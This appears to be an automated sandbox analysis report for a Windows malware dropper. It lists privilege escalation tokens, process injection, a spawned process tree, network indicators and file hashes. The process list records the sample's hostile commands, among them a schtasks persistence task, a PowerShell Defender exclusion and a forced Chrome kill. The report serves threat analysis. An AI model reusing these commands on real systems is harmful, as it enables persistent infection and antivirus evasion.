Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2300 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2528 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2764 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2704 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2248 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527218 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 432

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS843D.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1996 CREDAT:275457 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 iplogger.org udp
US 34.117.59.81:443 ipinfo.io tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
MD 176.123.2.239:80 176.123.2.239 tcp
N/A 127.0.0.1:49276 tcp
N/A 127.0.0.1:49278 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
MD 176.123.2.239:80 176.123.2.239 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 0182d7dcdb4e1d8c87ef13ccca528b16
SHA1 f0f3d321a0829992d81bba5460abad5c555439cd
SHA256 1f4d8c3b8625c3506e6907a4e50e2f43cd851cbde208af218e50a9994b35388b
SHA512 f21c3d8792e805ef3aceaf294385c383e0db4964d36a51654f82b97a448349631a1b829e9602ca78e60caa89311d85a7b569636766521c9f2de167e28860beb9

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe

MD5 aaaf685d045b423d4d96ecaca344b4d5
SHA1 f2264a40421e66029db1cdf7fe8bb8ada2614862
SHA256 f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8
SHA512 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2248-39-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2248-44-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2248-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2248-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2248-59-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2248-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2248-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe

MD5 77c7866632ae874b545152466fce77ad
SHA1 f48e76c8478a139ea77c03238a0499cfa1fc8cea
SHA256 e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43
SHA512 e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

